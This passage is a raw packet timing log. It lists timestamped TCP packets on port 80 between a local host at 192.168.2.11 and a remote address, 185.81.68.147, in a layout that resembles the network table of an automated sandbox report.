                                                                                                                                                                                                Dec 13, 2024 08:18:56.636343002 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.636363983 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.636482954 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.636498928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.636517048 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.636579037 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.636614084 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.637109041 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.637187004 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.637206078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.637227058 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.637269020 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.637378931 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.637751102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.637765884 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.637780905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.637800932 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.637898922 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.637913942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.637929916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.637934923 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.637948990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.637962103 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.638673067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.638704062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.638720036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.638721943 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.638751030 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.638900995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.638964891 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.638978958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.638993979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.639000893 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.639025927 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.639625072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.639693022 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.639709949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.639731884 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.639843941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.639859915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.639873981 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.639883995 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.639894009 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.639909983 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.640666962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.640716076 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.640727997 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.640743971 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.640779018 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.640834093 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.640850067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.640865088 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.640881062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.640883923 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.640940905 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.759541988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.759592056 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.759612083 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.759696960 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.759710073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.759730101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.759744883 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.759788036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.759804964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.759825945 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.759910107 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.759927988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.759952068 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.759958029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.759974003 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.759991884 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.759994030 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.760039091 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.760245085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.760266066 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.760312080 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.760668993 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.760715008 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.760732889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.760750055 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.760848045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.760865927 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.760890007 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.760973930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.761013985 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.761029005 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.761198997 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.761239052 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.761352062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.761368036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.761400938 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.761663914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.761681080 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.761699915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.761719942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.761739969 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.761778116 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.761974096 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.762083054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.762099981 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.762120008 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.762192011 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.762208939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.762224913 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.762227058 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.762245893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.762267113 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.762341022 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.762356997 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.762375116 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.762375116 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.762419939 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.762851954 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.762923002 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.762939930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.762959957 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.763044119 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.763071060 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.763087988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.763087988 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.763108015 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.763124943 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.763304949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.763334036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.763344049 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.763354063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.763417959 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.763838053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.763916016 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.763933897 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.763950109 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.764066935 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.764084101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.764100075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.764103889 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.764118910 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.764130116 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.764241934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.764270067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.764276981 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.764288902 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.764333963 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.764761925 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.764816046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.764832973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.764863968 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.764931917 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.764969110 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.764991999 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.765008926 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.765026093 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.765045881 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.765209913 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.765249968 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.765261889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.765279055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.765332937 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.765701056 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.765786886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.765825033 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.765866041 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.765883923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.765921116 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.765949965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.765986919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.766028881 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.766067028 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.766197920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.766215086 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.766232014 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.766242027 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.766282082 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.766700029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.766762972 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.766778946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.766799927 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.766921997 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.766938925 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.766957045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.766958952 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.766974926 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.767035961 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.767137051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.767174006 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.767184973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.767203093 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.767256021 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.767671108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.767767906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.767785072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.767802000 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.767920017 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.767937899 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.767956018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.767956972 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.767975092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.767996073 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780066013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780137062 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780196905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780252934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780271053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780282974 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780406952 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780424118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780441999 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780448914 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780467987 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780479908 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780667067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780685902 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780703068 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780812025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780831099 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780848026 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780848980 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780864954 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.780885935 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.824390888 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.951960087 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.951984882 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952050924 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952068090 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952275038 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952292919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952308893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952318907 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952332020 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952353001 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952423096 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952439070 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952459097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952467918 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952511072 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952584028 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952704906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952722073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952745914 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952873945 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952892065 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952908039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952915907 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.952940941 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953035116 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953051090 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953087091 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953181982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953237057 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953253984 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953269005 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953278065 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953279018 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953356981 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953535080 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953589916 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953685045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953701973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953751087 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953847885 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953865051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953881025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953900099 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953907013 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.953933001 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.954170942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.954191923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.954211950 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.954233885 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.954652071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.954709053 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.954832077 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.954854965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.954870939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.954886913 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.954904079 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.954929113 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.955018997 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.955037117 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.955065966 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.955172062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.955188036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.955208063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.955233097 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.955655098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.955672026 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.955688000 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.955724001 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.955743074 CET4972680192.168.2.11185.81.68.147
